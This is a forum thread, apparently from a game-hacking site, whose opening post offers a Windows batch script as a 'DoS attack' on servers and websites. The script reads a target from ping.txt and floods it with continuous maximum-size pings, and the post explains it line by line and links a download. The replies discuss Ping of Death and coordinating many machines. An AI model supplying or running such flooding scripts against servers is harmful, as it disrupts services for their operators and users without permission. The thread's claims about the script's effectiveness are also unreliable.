Results 1 to 5 of 5
  1. #1
    StaticHS's Avatar
    Join Date
    Jun 2012
    Gender
    male
    Location
    Australia
    Posts
    393
    Reputation
    48
    Thanks
    1,654
    My Mood
    Innocent

    Lightbulb [Batch] Making a Dos Attack (Servers and Websites)

    Hello, today I'm going to be showing you how to make a simple Dos Attack.
    Dos attacks are not very strong, but if you have a group that dos a server at the same time, you could easily crash it.
    Code:
    @echo off
    echo -------------------------------------------------
    echo !     This has been made by StaticHS @Mpgh.net!
    echo -------------------------------------------------
    set /p ping= <ping.txt
    ping %ping% -t -l 65500
    Code:
    echo -------------------------------------------------
    echo !     This has been made by StaticHS @Mpgh.net!
    echo -------------------------------------------------
    This shows who made it (if you release it).

    Code:
    set /p ping= <ping.txt
    Makes the ping able to be edited through a .txt file.

    Code:
    ping %ping% -t -l 65500
    Sends a lot of packets to the server in order to crash it.

    Virus Scans:
    https://www.virustotal.com/file/2c6e...is/1344153696/
    Dos tut.rar - Jotti's malware scan
    <b>Downloadable Files</b> Downloadable Files

  2. The Following 14 Users Say Thank You to StaticHS For This Useful Post:

    ahmednabih (08-27-2012),blackisout (09-22-2012),bobman2786 (12-08-2012),b_soulios (02-07-2014),Dinosaurier2905 (11-20-2015),FreeStuffPro.FSP (11-01-2014),hamod200965 (07-02-2013),Left4Witch (08-22-2017),malaka2502 (07-02-2014),nicholai (08-07-2012),Pwnagelord (08-18-2012),sacred1414 (07-21-2013),SomeAsianDudeNetwork (08-06-2012),taikaixin (06-01-2014)

  3. #2
    SomeAsianDudeNetwork's Avatar
    Join Date
    Aug 2012
    Gender
    male
    Posts
    4
    Reputation
    10
    Thanks
    0
    My Mood
    Stressed
    Isn't it DDoS? I don't know where I could test this and prove that it works :P.

    -Edit
    I downloaded it and I tried to run it and it didn't even run :P. I don't know how to remove my "Thank You"
    Last edited by SomeAsianDudeNetwork; 08-06-2012 at 10:50 AM.

  4. #3
    StaticHS's Avatar
    Join Date
    Jun 2012
    Gender
    male
    Location
    Australia
    Posts
    393
    Reputation
    48
    Thanks
    1,654
    My Mood
    Innocent
    Quote Originally Posted by SomeAsianDudeNetwork View Post
    Isn't it DDoS? I don't know where I could test this and prove that it works :P.

    -Edit
    I downloaded it and I tried to run it and it didn't even run :P. I don't know how to remove my "Thank You"
    I forgot to add something.
    You need to extract both files to the same directory.

    ---------- Post added at 06:17 PM ---------- Previous post was at 06:16 PM ----------

    You can't ddos with a batch file.
    Unless you have many computers attacking the same server at once.

  5. #4
    TrollerCoaster's Avatar
    Join Date
    Sep 2010
    Gender
    male
    Location
    I am a fish
    Posts
    633
    Reputation
    61
    Thanks
    800
    This alone will work in dial-up connections fairly well. Anyone know some dial-up servers? Didn't think so.
    This is also called Ping of Death, and on 64-bit machines it is possible to send more bytes at once in your ping packets.

    You also need an army of computers to successfully ping of death any vulnerable servers anyway.

  6. #5
    BluntGod_'s Avatar
    Join Date
    Aug 2012
    Gender
    male
    Location
    The Projects.
    Posts
    471
    Reputation
    167
    Thanks
    273
    My Mood
    Mellow
    Quote Originally Posted by TrollerCoaster View Post
    This alone will work in dial-up connections fairly well. Anyone know some dial-up servers? Didn't think so.
    This is also called Ping of Death, and on 64-bit machines it is possible to send more bytes at once in your ping packets.

    You also need an army of computers to successfully ping of death any vulnerable servers anyway.
    True. LOIC modification programs nowadays use the ping of death for attacks. Which is why most fail.

Similar Threads

  1. [Tutorial] How to make a minecraft multiplayer server [Hamachi and/or Lan network]
    By hello123321 in forum Minecraft Tutorials
    Replies: 2
    Last Post: 07-08-2011, 01:35 PM
  2. 19/10/10 6h00 gtm+1 Server and website down
    By furox94 in forum Call of Duty Modern Warfare 2 Private Servers
    Replies: 2
    Last Post: 10-19-2010, 06:24 AM
  3. DoS attack?
    By cool_guy in forum General Game Hacking
    Replies: 16
    Last Post: 02-27-2008, 09:47 AM
  4. request a dos attack
    By maze in forum General Hacking
    Replies: 2
    Last Post: 02-27-2008, 08:18 AM
  5. Any way to make my computer go fast and fater
    By Gourav2122 in forum Hardware & Software Support
    Replies: 18
    Last Post: 12-19-2006, 09:27 PM

Tags for this Thread